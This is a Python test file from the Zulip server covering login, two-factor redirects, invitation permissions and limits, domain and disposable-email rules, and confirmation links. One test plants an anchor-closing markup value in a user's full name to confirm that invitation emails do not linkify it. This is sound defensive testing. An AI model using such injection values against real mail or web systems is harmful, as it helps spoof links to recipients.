def test_non_ascii_login(self) -> None:
"""
You can log in even if your password contain non-ASCII characters.
"""
email = self.nonreg_email('test')
password = "hümbüǵ"
# Registering succeeds.
self.register(email, password)
user_profile = self.nonreg_user('test')
self.assert_logged_in_user_id(user_profile.id)
self.logout()
self.assert_logged_in_user_id(None)
# Logging in succeeds.
self.logout()
self.login_by_email(email, password)
self.assert_logged_in_user_id(user_profile.id)
@override_settings(TWO_FACTOR_AUTHENTICATION_ENABLED=False)
def test_login_page_redirects_logged_in_user(self) -> None:
"""You will be redirected to the app's main page if you land on the
login page when already logged in.
"""
self.login('cordelia')
response = self.client_get("/login/")
self.assertEqual(response["Location"], "http://zulip.testserver")
def test_options_request_to_login_page(self) -> None:
response = self.client_options('/login/')
self.assertEqual(response.status_code, 200)
@override_settings(TWO_FACTOR_AUTHENTICATION_ENABLED=True)
def test_login_page_redirects_logged_in_user_under_2fa(self) -> None:
"""You will be redirected to the app's main page if you land on the
login page when already logged in.
"""
user_profile = self.example_user("cordelia")
self.create_default_device(user_profile)
self.login('cordelia')
self.login_2fa(user_profile)
response = self.client_get("/login/")
self.assertEqual(response["Location"], "http://zulip.testserver")
def test_start_two_factor_auth(self) -> None:
request = MagicMock(POST=dict())
with patch('zerver.views.auth.TwoFactorLoginView') as mock_view:
mock_view.as_view.return_value = lambda *a, **k: HttpResponse()
response = start_two_factor_auth(request)
self.assertTrue(isinstance(response, HttpResponse))
def test_do_two_factor_login(self) -> None:
user_profile = self.example_user('hamlet')
self.create_default_device(user_profile)
request = MagicMock()
with patch('zerver.decorator.django_otp.login') as mock_login:
do_two_factor_login(request, user_profile)
mock_login.assert_called_once()
def test_zulip_default_context_does_not_load_inline_previews(self) -> None:
realm = get_realm("zulip")
description = "https://www.google.com/images/srpr/logo4w.png"
realm.description = description
realm.save(update_fields=["description"])
response = self.client_get("/login/")
expected_response = """<p><a href="https://www.google.com/images/srpr/logo4w.png">\
https://www.google.com/images/srpr/logo4w.png</a></p>"""
self.assertEqual(response.context_data["realm_description"], expected_response)
self.assertEqual(response.status_code, 200)
class InviteUserBase(ZulipTestCase):
def check_sent_emails(self, correct_recipients: List[str],
custom_from_name: Optional[str]=None) -> None:
from django.core.mail import outbox
self.assertEqual(len(outbox), len(correct_recipients))
email_recipients = [email.recipients()[0] for email in outbox]
self.assertEqual(sorted(email_recipients), sorted(correct_recipients))
if len(outbox) == 0:
return
if custom_from_name is not None:
self.assertIn(custom_from_name, outbox[0].from_email)
self.assertRegex(outbox[0].from_email, fr" <{self.TOKENIZED_NOREPLY_REGEX}>\Z")
def invite(self, invitee_emails: str, stream_names: Sequence[str], body: str='',
invite_as: int=PreregistrationUser.INVITE_AS['MEMBER']) -> HttpResponse:
"""
Invites the specified users to Zulip with the specified streams.
users should be a string containing the users to invite, comma or
newline separated.
streams should be a list of strings.
"""
stream_ids = []
for stream_name in stream_names:
stream_ids.append(self.get_stream_id(stream_name))
return self.client_post("/json/invites",
{"invitee_emails": invitee_emails,
"stream_ids": ujson.dumps(stream_ids),
"invite_as": invite_as})
class InviteUserTest(InviteUserBase):
def test_successful_invite_user(self) -> None:
"""
A call to /json/invites with valid parameters causes an invitation
email to be sent.
"""
self.login('hamlet')
invitee = "alice-test@zulip.com"
self.assert_json_success(self.invite(invitee, ["Denmark"]))
self.assertTrue(find_key_by_email(invitee))
self.check_sent_emails([invitee], custom_from_name="Hamlet")
def test_newbie_restrictions(self) -> None:
user_profile = self.example_user('hamlet')
invitee = "alice-test@zulip.com"
stream_name = 'Denmark'
self.login_user(user_profile)
result = self.invite(invitee, [stream_name])
self.assert_json_success(result)
user_profile.date_joined = timezone_now() - datetime.timedelta(days=10)
user_profile.save()
with self.settings(INVITES_MIN_USER_AGE_DAYS=5):
result = self.invite(invitee, [stream_name])
self.assert_json_success(result)
with self.settings(INVITES_MIN_USER_AGE_DAYS=15):
result = self.invite(invitee, [stream_name])
self.assert_json_error_contains(result, "Your account is too new")
def test_invite_limits(self) -> None:
user_profile = self.example_user('hamlet')
realm = user_profile.realm
stream_name = 'Denmark'
# These constants only need to be in descending order
# for this test to trigger an InvitationError based
# on max daily counts.
site_max = 50
realm_max = 40
num_invitees = 30
max_daily_count = 20
daily_counts = [(1, max_daily_count)]
invite_emails = [
f'foo-{i:02}@zulip.com'
for i in range(num_invitees)
]
invitees = ','.join(invite_emails)
self.login_user(user_profile)
realm.max_invites = realm_max
realm.date_created = timezone_now()
realm.save()
def try_invite() -> HttpResponse:
with self.settings(OPEN_REALM_CREATION=True,
INVITES_DEFAULT_REALM_DAILY_MAX=site_max,
INVITES_NEW_REALM_LIMIT_DAYS=daily_counts):
result = self.invite(invitees, [stream_name])
return result
result = try_invite()
self.assert_json_error_contains(result, 'enough remaining invites')
# Next show that aggregate limits expire once the realm is old
# enough.
realm.date_created = timezone_now() - datetime.timedelta(days=8)
realm.save()
with queries_captured() as queries:
result = try_invite()
# TODO: Fix large query count here.
#
# TODO: There is some test OTHER than this one
# that is leaking some kind of state change
# that throws off the query count here. It
# is hard to investigate currently (due to
# the large number of queries), so I just
# use an approximate equality check.
actual_count = len(queries)
expected_count = 312
if abs(actual_count - expected_count) > 1:
raise AssertionError(f'''
Unexpected number of queries:
expected query count: {expected_count}
actual: {actual_count}
''')
self.assert_json_success(result)
# Next get line coverage on bumping a realm's max_invites.
realm.date_created = timezone_now()
realm.max_invites = site_max + 10
realm.save()
result = try_invite()
self.assert_json_success(result)
# Finally get coverage on the case that OPEN_REALM_CREATION is False.
with self.settings(OPEN_REALM_CREATION=False):
result = self.invite(invitees, [stream_name])
self.assert_json_success(result)
def test_cross_realm_bot(self) -> None:
inviter = self.example_user('hamlet')
self.login_user(inviter)
cross_realm_bot_email = 'emailgateway@zulip.com'
legit_new_email = 'fred@zulip.com'
invitee_emails = ','.join([cross_realm_bot_email, legit_new_email])
result = self.invite(invitee_emails, ['Denmark'])
self.assert_json_error(
result,
"Some of those addresses are already using Zulip," +
" so we didn't send them an invitation." +
" We did send invitations to everyone else!")
def test_invite_mirror_dummy_user(self) -> None:
'''
A mirror dummy account is a temporary account
that we keep in our system if we are mirroring
data from something like Zephyr or IRC.
We want users to eventually just sign up or
register for Zulip, in which case we will just
fully "activate" the account.
Here we test that you can invite a person who
has a mirror dummy account.
'''
inviter = self.example_user('hamlet')
self.login_user(inviter)
mirror_user = self.example_user('cordelia')
mirror_user.is_mirror_dummy = True
mirror_user.is_active = False
mirror_user.save()
self.assertEqual(
PreregistrationUser.objects.filter(email=mirror_user.email).count(),
0,
)
result = self.invite(mirror_user.email, ['Denmark'])
self.assert_json_success(result)
prereg_user = PreregistrationUser.objects.get(email=mirror_user.email)
self.assertEqual(
prereg_user.referred_by.email,
inviter.email,
)
def test_successful_invite_user_as_owner_from_owner_account(self) -> None:
self.login('desdemona')
invitee = self.nonreg_email('alice')
result = self.invite(invitee, ["Denmark"],
invite_as=PreregistrationUser.INVITE_AS['REALM_OWNER'])
self.assert_json_success(result)
self.assertTrue(find_key_by_email(invitee))
self.submit_reg_form_for_user(invitee, "password")
invitee_profile = self.nonreg_user('alice')
self.assertTrue(invitee_profile.is_realm_owner)
self.assertFalse(invitee_profile.is_guest)
def test_invite_user_as_owner_from_admin_account(self) -> None:
self.login('iago')
invitee = self.nonreg_email('alice')
response = self.invite(invitee, ["Denmark"],
invite_as=PreregistrationUser.INVITE_AS['REALM_OWNER'])
self.assert_json_error(response, "Must be an organization owner")
def test_successful_invite_user_as_admin_from_admin_account(self) -> None:
self.login('iago')
invitee = self.nonreg_email('alice')
result = self.invite(invitee, ["Denmark"],
invite_as=PreregistrationUser.INVITE_AS['REALM_ADMIN'])
self.assert_json_success(result)
self.assertTrue(find_key_by_email(invitee))
self.submit_reg_form_for_user(invitee, "password")
invitee_profile = self.nonreg_user('alice')
self.assertTrue(invitee_profile.is_realm_admin)
self.assertFalse(invitee_profile.is_realm_owner)
self.assertFalse(invitee_profile.is_guest)
def test_invite_user_as_admin_from_normal_account(self) -> None:
self.login('hamlet')
invitee = self.nonreg_email('alice')
response = self.invite(invitee, ["Denmark"],
invite_as=PreregistrationUser.INVITE_AS['REALM_ADMIN'])
self.assert_json_error(response, "Must be an organization administrator")
def test_invite_user_as_invalid_type(self) -> None:
"""
Test inviting a user as invalid type of user i.e. type of invite_as
is not in PreregistrationUser.INVITE_AS
"""
self.login('iago')
invitee = self.nonreg_email('alice')
response = self.invite(invitee, ["Denmark"], invite_as=10)
self.assert_json_error(response, "Must be invited as an valid type of user")
def test_successful_invite_user_as_guest_from_normal_account(self) -> None:
self.login('hamlet')
invitee = self.nonreg_email('alice')
self.assert_json_success(self.invite(invitee, ["Denmark"],
invite_as=PreregistrationUser.INVITE_AS['GUEST_USER']))
self.assertTrue(find_key_by_email(invitee))
self.submit_reg_form_for_user(invitee, "password")
invitee_profile = self.nonreg_user('alice')
self.assertFalse(invitee_profile.is_realm_admin)
self.assertTrue(invitee_profile.is_guest)
def test_successful_invite_user_as_guest_from_admin_account(self) -> None:
self.login('iago')
invitee = self.nonreg_email('alice')
self.assert_json_success(self.invite(invitee, ["Denmark"],
invite_as=PreregistrationUser.INVITE_AS['GUEST_USER']))
self.assertTrue(find_key_by_email(invitee))
self.submit_reg_form_for_user(invitee, "password")
invitee_profile = self.nonreg_user('alice')
self.assertFalse(invitee_profile.is_realm_admin)
self.assertTrue(invitee_profile.is_guest)
def test_successful_invite_user_with_name(self) -> None:
"""
A call to /json/invites with valid parameters causes an invitation
email to be sent.
"""
self.login('hamlet')
email = "alice-test@zulip.com"
invitee = f"Alice Test <{email}>"
self.assert_json_success(self.invite(invitee, ["Denmark"]))
self.assertTrue(find_key_by_email(email))
self.check_sent_emails([email], custom_from_name="Hamlet")
def test_successful_invite_user_with_name_and_normal_one(self) -> None:
"""
A call to /json/invites with valid parameters causes an invitation
email to be sent.
"""
self.login('hamlet')
email = "alice-test@zulip.com"
email2 = "bob-test@zulip.com"
invitee = f"Alice Test <{email}>, {email2}"
self.assert_json_success(self.invite(invitee, ["Denmark"]))
self.assertTrue(find_key_by_email(email))
self.assertTrue(find_key_by_email(email2))
self.check_sent_emails([email, email2], custom_from_name="Hamlet")
def test_require_realm_admin(self) -> None:
"""
The invite_by_admins_only realm setting works properly.
"""
realm = get_realm('zulip')
realm.invite_by_admins_only = True
realm.save()
self.login('hamlet')
email = "alice-test@zulip.com"
email2 = "bob-test@zulip.com"
invitee = f"Alice Test <{email}>, {email2}"
self.assert_json_error(self.invite(invitee, ["Denmark"]),
"Must be an organization administrator")
# Now verify an administrator can do it
self.login('iago')
self.assert_json_success(self.invite(invitee, ["Denmark"]))
self.assertTrue(find_key_by_email(email))
self.assertTrue(find_key_by_email(email2))
self.check_sent_emails([email, email2])
def test_invite_user_signup_initial_history(self) -> None:
"""
Test that a new user invited to a stream receives some initial
history but only from public streams.
"""
self.login('hamlet')
user_profile = self.example_user('hamlet')
private_stream_name = "Secret"
self.make_stream(private_stream_name, invite_only=True)
self.subscribe(user_profile, private_stream_name)
public_msg_id = self.send_stream_message(
self.example_user("hamlet"),
"Denmark",
topic_name="Public topic",
content="Public message",
)
secret_msg_id = self.send_stream_message(
self.example_user("hamlet"),
private_stream_name,
topic_name="Secret topic",
content="Secret message",
)
invitee = self.nonreg_email('alice')
self.assert_json_success(self.invite(invitee, [private_stream_name, "Denmark"]))
self.assertTrue(find_key_by_email(invitee))
self.submit_reg_form_for_user(invitee, "password")
invitee_profile = self.nonreg_user('alice')
invitee_msg_ids = [um.message_id for um in
UserMessage.objects.filter(user_profile=invitee_profile)]
self.assertTrue(public_msg_id in invitee_msg_ids)
self.assertFalse(secret_msg_id in invitee_msg_ids)
self.assertFalse(invitee_profile.is_realm_admin)
# Test that exactly 2 new Zulip messages were sent, both notifications.
last_3_messages = list(reversed(list(Message.objects.all().order_by("-id")[0:3])))
first_msg = last_3_messages[0]
self.assertEqual(first_msg.id, secret_msg_id)
# The first, from notification-bot to the user who invited the new user.
second_msg = last_3_messages[1]
self.assertEqual(second_msg.sender.email, "notification-bot@zulip.com")
self.assertTrue(second_msg.content.startswith(
f"alice_zulip.com <`{invitee_profile.email}`> accepted your",
))
# The second, from welcome-bot to the user who was invited.
third_msg = last_3_messages[2]
self.assertEqual(third_msg.sender.email, "welcome-bot@zulip.com")
self.assertTrue(third_msg.content.startswith("Hello, and welcome to Zulip!"))
def test_multi_user_invite(self) -> None:
"""
Invites multiple users with a variety of delimiters.
"""
self.login('hamlet')
# Intentionally use a weird string.
self.assert_json_success(self.invite(
"""bob-test@zulip.com, carol-test@zulip.com,
dave-test@zulip.com
earl-test@zulip.com""", ["Denmark"]))
for user in ("bob", "carol", "dave", "earl"):
self.assertTrue(find_key_by_email(f"{user}-test@zulip.com"))
self.check_sent_emails(["bob-test@zulip.com", "carol-test@zulip.com",
"dave-test@zulip.com", "earl-test@zulip.com"])
def test_max_invites_model(self) -> None:
realm = get_realm("zulip")
self.assertEqual(realm.max_invites, settings.INVITES_DEFAULT_REALM_DAILY_MAX)
realm.max_invites = 3
realm.save()
self.assertEqual(get_realm("zulip").max_invites, 3)
realm.max_invites = settings.INVITES_DEFAULT_REALM_DAILY_MAX
realm.save()
def test_invite_too_many_users(self) -> None:
# Only a light test of this pathway; e.g. doesn't test that
# the limit gets reset after 24 hours
self.login('iago')
invitee_emails = "1@zulip.com, 2@zulip.com"
self.invite(invitee_emails, ["Denmark"])
invitee_emails = ", ".join([str(i) for i in range(get_realm("zulip").max_invites - 1)])
self.assert_json_error(self.invite(invitee_emails, ["Denmark"]),
"You do not have enough remaining invites. "
"Please contact desdemona+admin@zulip.com to have your limit raised. "
"No invitations were sent.")
def test_missing_or_invalid_params(self) -> None:
"""
Tests inviting with various missing or invalid parameters.
"""
realm = get_realm('zulip')
do_set_realm_property(realm, 'emails_restricted_to_domains', True)
self.login('hamlet')
invitee_emails = "foo@zulip.com"
self.assert_json_error(self.invite(invitee_emails, []),
"You must specify at least one stream for invitees to join.")
for address in ("noatsign.com", "outsideyourdomain@example.net"):
self.assert_json_error(
self.invite(address, ["Denmark"]),
"Some emails did not validate, so we didn't send any invitations.")
self.check_sent_emails([])
self.assert_json_error(
self.invite("", ["Denmark"]),
"You must specify at least one email address.")
self.check_sent_emails([])
def test_guest_user_invitation(self) -> None:
"""
Guest user can't invite new users
"""
self.login('polonius')
invitee = "alice-test@zulip.com"
self.assert_json_error(self.invite(invitee, ["Denmark"]), "Not allowed for guest users")
self.assertEqual(find_key_by_email(invitee), None)
self.check_sent_emails([])
def test_invalid_stream(self) -> None:
"""
Tests inviting to a non-existent stream.
"""
self.login('hamlet')
self.assert_json_error(self.invite("iago-test@zulip.com", ["NotARealStream"]),
f"Stream does not exist with id: {self.INVALID_STREAM_ID}. No invites were sent.")
self.check_sent_emails([])
def test_invite_existing_user(self) -> None:
"""
If you invite an address already using Zulip, no invitation is sent.
"""
self.login('hamlet')
hamlet_email = 'hAmLeT@zUlIp.com'
result = self.invite(hamlet_email, ["Denmark"])
self.assert_json_error(result, "We weren't able to invite anyone.")
self.assertFalse(
PreregistrationUser.objects.filter(email__iexact=hamlet_email).exists(),
)
self.check_sent_emails([])
def normalize_string(self, s: str) -> str:
s = s.strip()
return re.sub(r'\s+', ' ', s)
def test_invite_links_in_name(self) -> None:
"""
If you invite an address already using Zulip, no invitation is sent.
"""
hamlet = self.example_user("hamlet")
self.login_user(hamlet)
# Test we properly handle links in user full names
do_change_full_name(hamlet, "</a> https://www.google.com", hamlet)
result = self.invite('newuser@zulip.com', ["Denmark"])
self.assert_json_success(result)
self.check_sent_emails(['newuser@zulip.com'])
from django.core.mail import outbox
body = self.normalize_string(outbox[0].alternatives[0][0])
# Verify that one can't get Zulip to send invitation emails
# that third-party products will linkify using the full_name
# field, because we've included that field inside the mailto:
# link for the sender.
self.assertIn('<a href="mailto:hamlet@zulip.com" style="color:#46aa8f; text-decoration:underline"></a> https://www.google.com (hamlet@zulip.com)</a> wants', body)
# TODO: Ideally, this test would also test the Invitation
# Reminder email generated, but the test setup for that is
# annoying.
def test_invite_some_existing_some_new(self) -> None:
"""
If you invite a mix of already existing and new users, invitations are
only sent to the new users.
"""
self.login('hamlet')
existing = [self.example_email("hamlet"), "othello@zulip.com"]
new = ["foo-test@zulip.com", "bar-test@zulip.com"]
invitee_emails = "\n".join(existing + new)
self.assert_json_error(self.invite(invitee_emails, ["Denmark"]),
"Some of those addresses are already using Zulip, \
so we didn't send them an invitation. We did send invitations to everyone else!")
# We only created accounts for the new users.
for email in existing:
self.assertRaises(PreregistrationUser.DoesNotExist,
lambda: PreregistrationUser.objects.get(
email=email))
for email in new:
self.assertTrue(PreregistrationUser.objects.get(email=email))
# We only sent emails to the new users.
self.check_sent_emails(new)
prereg_user = PreregistrationUser.objects.get(email='foo-test@zulip.com')
self.assertEqual(prereg_user.email, 'foo-test@zulip.com')
def test_invite_outside_domain_in_closed_realm(self) -> None:
"""
In a realm with `emails_restricted_to_domains = True`, you can't invite people
with a different domain from that of the realm or your e-mail address.
"""
zulip_realm = get_realm("zulip")
zulip_realm.emails_restricted_to_domains = True
zulip_realm.save()
self.login('hamlet')
external_address = "foo@example.com"
self.assert_json_error(
self.invite(external_address, ["Denmark"]),
"Some emails did not validate, so we didn't send any invitations.")
def test_invite_using_disposable_email(self) -> None:
"""
In a realm with `disallow_disposable_email_addresses = True`, you can't invite
people with a disposable domain.
"""
zulip_realm = get_realm("zulip")
zulip_realm.emails_restricted_to_domains = False
zulip_realm.disallow_disposable_email_addresses = True
zulip_realm.save()
self.login('hamlet')
external_address = "foo@mailnator.com"
self.assert_json_error(
self.invite(external_address, ["Denmark"]),
"Some emails did not validate, so we didn't send any invitations.")
def test_invite_outside_domain_in_open_realm(self) -> None:
"""
In a realm with `emails_restricted_to_domains = False`, you can invite people
with a different domain from that of the realm or your e-mail address.
"""
zulip_realm = get_realm("zulip")
zulip_realm.emails_restricted_to_domains = False
zulip_realm.save()
self.login('hamlet')
external_address = "foo@example.com"
self.assert_json_success(self.invite(external_address, ["Denmark"]))
self.check_sent_emails([external_address])
def test_invite_outside_domain_before_closing(self) -> None:
"""
If you invite someone with a different domain from that of the realm
when `emails_restricted_to_domains = False`, but `emails_restricted_to_domains` later
changes to true, the invitation should succeed but the invitee's signup
attempt should fail.
"""
zulip_realm = get_realm("zulip")
zulip_realm.emails_restricted_to_domains = False
zulip_realm.save()
self.login('hamlet')
external_address = "foo@example.com"
self.assert_json_success(self.invite(external_address, ["Denmark"]))
self.check_sent_emails([external_address])
zulip_realm.emails_restricted_to_domains = True
zulip_realm.save()
result = self.submit_reg_form_for_user("foo@example.com", "password")
self.assertEqual(result.status_code, 200)
self.assert_in_response("only allows users with email addresses", result)
def test_disposable_emails_before_closing(self) -> None:
"""
If you invite someone with a disposable email when
`disallow_disposable_email_addresses = False`, but
later changes to true, the invitation should succeed
but the invitee's signup attempt should fail.
"""
zulip_realm = get_realm("zulip")
zulip_realm.emails_restricted_to_domains = False
zulip_realm.disallow_disposable_email_addresses = False
zulip_realm.save()
self.login('hamlet')
external_address = "foo@mailnator.com"
self.assert_json_success(self.invite(external_address, ["Denmark"]))
self.check_sent_emails([external_address])
zulip_realm.disallow_disposable_email_addresses = True
zulip_realm.save()
result = self.submit_reg_form_for_user("foo@mailnator.com", "password")
self.assertEqual(result.status_code, 200)
self.assert_in_response("Please sign up using a real email address.", result)
def test_invite_with_email_containing_plus_before_closing(self) -> None:
"""
If you invite someone with an email containing plus when
`emails_restricted_to_domains = False`, but later change
`emails_restricted_to_domains = True`, the invitation should
succeed but the invitee's signup attempt should fail as
users are not allowed to signup using email containing +
when the realm is restricted to domain.
"""
zulip_realm = get_realm("zulip")
zulip_realm.emails_restricted_to_domains = False
zulip_realm.save()
self.login('hamlet')
external_address = "foo+label@zulip.com"
self.assert_json_success(self.invite(external_address, ["Denmark"]))
self.check_sent_emails([external_address])
zulip_realm.emails_restricted_to_domains = True
zulip_realm.save()
result = self.submit_reg_form_for_user(external_address, "password")
self.assertEqual(result.status_code, 200)
self.assert_in_response("Zulip Dev, does not allow signups using emails\n that contains +", result)
def test_invalid_email_check_after_confirming_email(self) -> None:
self.login('hamlet')
email = "test@zulip.com"
self.assert_json_success(self.invite(email, ["Denmark"]))
obj = Confirmation.objects.get(confirmation_key=find_key_by_email(email))
prereg_user = obj.content_object
prereg_user.email = "invalid.email"
prereg_user.save()
result = self.submit_reg_form_for_user(email, "password")
self.assertEqual(result.status_code, 200)
self.assert_in_response("The email address you are trying to sign up with is not valid", result)
def test_invite_with_non_ascii_streams(self) -> None:
"""
Inviting someone to streams with non-ASCII characters succeeds.
"""
self.login('hamlet')
invitee = "alice-test@zulip.com"
stream_name = "hümbüǵ"
# Make sure we're subscribed before inviting someone.
self.subscribe(self.example_user("hamlet"), stream_name)
self.assert_json_success(self.invite(invitee, [stream_name]))
def test_invitation_reminder_email(self) -> None:
from django.core.mail import outbox
# All users belong to zulip realm
referrer_name = 'hamlet'
current_user = self.example_user(referrer_name)
self.login_user(current_user)
invitee_email = self.nonreg_email('alice')
self.assert_json_success(self.invite(invitee_email, ["Denmark"]))
self.assertTrue(find_key_by_email(invitee_email))
self.check_sent_emails([invitee_email])
data = {"email": invitee_email, "referrer_email": current_user.email}
invitee = PreregistrationUser.objects.get(email=data["email"])
referrer = self.example_user(referrer_name)
link = create_confirmation_link(invitee, Confirmation.INVITATION)
context = common_context(referrer)
context.update({
'activate_url': link,
'referrer_name': referrer.full_name,
'referrer_email': referrer.email,
'referrer_realm_name': referrer.realm.name,
})
with self.settings(EMAIL_BACKEND='django.core.mail.backends.console.EmailBackend'):
email = data["email"]
send_future_email(
"zerver/emails/invitation_reminder", referrer.realm, to_emails=[email],
from_address=FromAddress.no_reply_placeholder, context=context)
email_jobs_to_deliver = ScheduledEmail.objects.filter(
scheduled_timestamp__lte=timezone_now())
self.assertEqual(len(email_jobs_to_deliver), 1)
email_count = len(outbox)
for job in email_jobs_to_deliver:
deliver_email(job)
self.assertEqual(len(outbox), email_count + 1)
self.assertIn(FromAddress.NOREPLY, outbox[-1].from_email)
# Now verify that signing up clears invite_reminder emails
with self.settings(EMAIL_BACKEND='django.core.mail.backends.console.EmailBackend'):
email = data["email"]
send_future_email(
"zerver/emails/invitation_reminder", referrer.realm, to_emails=[email],
from_address=FromAddress.no_reply_placeholder, context=context)
email_jobs_to_deliver = ScheduledEmail.objects.filter(
scheduled_timestamp__lte=timezone_now(), type=ScheduledEmail.INVITATION_REMINDER)
self.assertEqual(len(email_jobs_to_deliver), 1)
self.register(invitee_email, "test")
email_jobs_to_deliver = ScheduledEmail.objects.filter(
scheduled_timestamp__lte=timezone_now(), type=ScheduledEmail.INVITATION_REMINDER)
self.assertEqual(len(email_jobs_to_deliver), 0)
def test_no_invitation_reminder_when_link_expires_quickly(self) -> None:
self.login('hamlet')
# Check invitation reminder email is scheduled with 4 day link expiry
with self.settings(INVITATION_LINK_VALIDITY_DAYS=4):
self.invite('alice@zulip.com', ['Denmark'])
self.assertEqual(ScheduledEmail.objects.filter(type=ScheduledEmail.INVITATION_REMINDER).count(), 1)
# Check invitation reminder email is not scheduled with 3 day link expiry
with self.settings(INVITATION_LINK_VALIDITY_DAYS=3):
self.invite('bob@zulip.com', ['Denmark'])
self.assertEqual(ScheduledEmail.objects.filter(type=ScheduledEmail.INVITATION_REMINDER).count(), 1)
# make sure users can't take a valid confirmation key from another
# pathway and use it with the invitation url route
def test_confirmation_key_of_wrong_type(self) -> None:
email = self.nonreg_email("alice")
realm = get_realm('zulip')
inviter = self.example_user('iago')
prereg_user = PreregistrationUser.objects.create(
email=email, referred_by=inviter, realm=realm)
url = create_confirmation_link(prereg_user, Confirmation.USER_REGISTRATION)
registration_key = url.split('/')[-1]
# Mainly a test of get_object_from_key, rather than of the invitation pathway
with self.assertRaises(ConfirmationKeyException) as cm:
get_object_from_key(registration_key, Confirmation.INVITATION)
self.assertEqual(cm.exception.error_type, ConfirmationKeyException.DOES_NOT_EXIST)
# Verify that using the wrong type doesn't work in the main confirm code path
email_change_url = create_confirmation_link(prereg_user, Confirmation.EMAIL_CHANGE)
email_change_key = email_change_url.split('/')[-1]
url = '/accounts/do_confirm/' + email_change_key
result = self.client_get(url)
self.assert_in_success_response(["Whoops. We couldn't find your "
"confirmation link in the system."], result)
def test_confirmation_expired(self) -> None:
email = self.nonreg_email("alice")
realm = get_realm('zulip')
inviter = self.example_user('iago')
prereg_user = PreregistrationUser.objects.create(
email=email, referred_by=inviter, realm=realm)
url = create_confirmation_link(prereg_user, Confirmation.USER_REGISTRATION)
registration_key = url.split('/')[-1]
conf = Confirmation.objects.filter(confirmation_key=registration_key).first()
conf.date_sent -= datetime.timedelta(weeks=3)
conf.save()
target_url = '/' + url.split('/', 3)[3]
result = self.client_get(target_url)
self.assert_in_success_response(["Whoops. The confirmation link has expired "
"or been deactivated."], result)
def test_send_more_than_one_invite_to_same_user(self) -> None:
self.user_profile = self.example_user('iago')
streams = []
for stream_name in ["Denmark", "Scotland"]:
streams.append(get_stream(stream_name, self.user_profile.realm))
do_invite_users(self.user_profile, ["foo@zulip.com"], streams, False)
prereg_user = PreregistrationUser.objects.get(email="foo@zulip.com")
do_invite_users(self.user_profile, ["foo@zulip.com"], streams, False)
do_invite_users(self.user_profile, ["foo@zulip.com"], streams, False)
invites = PreregistrationUser.objects.filter(email__iexact="foo@zulip.com")
self.assertEqual(len(invites), 3)
do_create_user(
'foo@zulip.com',
'password',
self.user_profile.realm,
'full name', 'short name',
prereg_user=prereg_user,
)
accepted_invite = PreregistrationUser.objects.filter(
email__iexact="foo@zulip.com", status=confirmation_settings.STATUS_ACTIVE)
revoked_invites = PreregistrationUser.objects.filter(
email__iexact="foo@zulip.com", status=confirmation_settings.STATUS_REVOKED)
# If a user was invited more than once, when it accepts one invite and register
# the others must be canceled.
self.assertEqual(len(accepted_invite), 1)
self.assertEqual(accepted_invite[0].id, prereg_user.id)
expected_revoked_invites = set(invites.exclude(id=prereg_user.id))
self.assertEqual(set(revoked_invites), expected_revoked_invites)
def test_confirmation_obj_not_exist_error(self) -> None:
""" Since the key is a param input by the user to the registration endpoint,
if it inserts an invalid value, the confirmation object won't be found. This
tests if, in that scenario, we handle the exception by redirecting the user to
the confirmation_link_expired_error page.
"""
email = self.nonreg_email('alice')
password = 'password'
realm = get_realm('zulip')
inviter = self.example_user('iago')
prereg_user = PreregistrationUser.objects.create(
email=email, referred_by=inviter, realm=realm)
confirmation_link = create_confirmation_link(prereg_user, Confirmation.USER_REGISTRATION)
registration_key = 'invalid_confirmation_key'
url = '/accounts/register/'
response = self.client_post(url, {'key': registration_key, 'from_confirmation': 1, 'full_nme': 'alice'})
self.assertEqual(response.status_code, 200)
self.assert_in_success_response(['The registration link has expired or is not valid.'], response)
registration_key = confirmation_link.split('/')[-1]
response = self.client_post(url, {'key': registration_key, 'from_confirmation': 1, 'full_nme': 'alice'})
self.assert_in_success_response(['We just need you to do one last thing.'], response)
response = self.submit_reg_form_for_user(email, password, key=registration_key)
self.assertEqual(response.status_code, 302)
def test_validate_email_not_already_in_realm(self) -> None:
email = self.nonreg_email('alice')
password = 'password'
realm = get_realm('zulip')
inviter = self.example_user('iago')
prereg_user = PreregistrationUser.objects.create(
email=email, referred_by=inviter, realm=realm)
confirmation_link = create_confirmation_link(prereg_user, Confirmation.USER_REGISTRATION)
registration_key = confirmation_link.split('/')[-1]
url = "/accounts/register/"
self.client_post(url, {"key": registration_key, "from_confirmation": 1, "full_name": "alice"})
self.submit_reg_form_for_user(email, password, key=registration_key)
url = "/accounts/register/"
response = self.client_post(url, {"key": registration_key, "from_confirmation": 1, "full_name": "alice"})
self.assertEqual(response.status_code, 302)
self.assertEqual(response.url, reverse('django.contrib.auth.views.login') + '?email=' +
urllib.parse.quote_plus(email))
class InvitationsTestCase(InviteUserBase):
def test_do_get_user_invites(self) -> None:
self.login('iago')
user_profile = self.example_user("iago")
hamlet = self.example_user('hamlet')
othello = self.example_user('othello')
prereg_user_one = PreregistrationUser(email="TestOne@zulip.com", referred_by=user_profile)
prereg_user_one.save()
prereg_user_two = PreregistrationUser(email="TestTwo@zulip.com", referred_by=user_profile)
prereg_user_two.save()
prereg_user_three = PreregistrationUser(email="TestThree@zulip.com", referred_by=hamlet)
prereg_user_three.save()
prereg_user_four = PreregistrationUser(email="TestFour@zulip.com", referred_by=othello)
prereg_user_four.save()
prereg_user_other_realm = PreregistrationUser(
email="TestOne@zulip.com", referred_by=self.mit_user("sipbtest"))
prereg_user_other_realm.save()
multiuse_invite = MultiuseInvite.objects.create(referred_by=user_profile, realm=user_profile.realm)
create_confirmation_link(multiuse_invite, Confirmation.MULTIUSE_INVITE)
self.assertEqual(len(do_get_user_invites(user_profile)), 5)
self.assertEqual(len(do_get_user_invites(hamlet)), 1)
self.assertEqual(len(do_get_user_invites(othello)), 1)
def test_successful_get_open_invitations(self) -> None:
"""
A GET call to /json/invites returns all unexpired invitations.
"""
realm = get_realm("zulip")
days_to_activate = getattr(settings, 'INVITATION_LINK_VALIDITY_DAYS', "Wrong")
active_value = getattr(confirmation_settings, 'STATUS_ACTIVE', "Wrong")
self.assertNotEqual(days_to_activate, "Wrong")
self.assertNotEqual(active_value, "Wrong")
self.login('iago')
user_profile = self.example_user("iago")
prereg_user_one = PreregistrationUser(email="TestOne@zulip.com", referred_by=user_profile)
prereg_user_one.save()
expired_datetime = timezone_now() - datetime.timedelta(days=(days_to_activate+1))
prereg_user_two = PreregistrationUser(email="TestTwo@zulip.com", referred_by=user_profile)
prereg_user_two.save()
PreregistrationUser.objects.filter(id=prereg_user_two.id).update(invited_at=expired_datetime)
prereg_user_three = PreregistrationUser(email="TestThree@zulip.com",
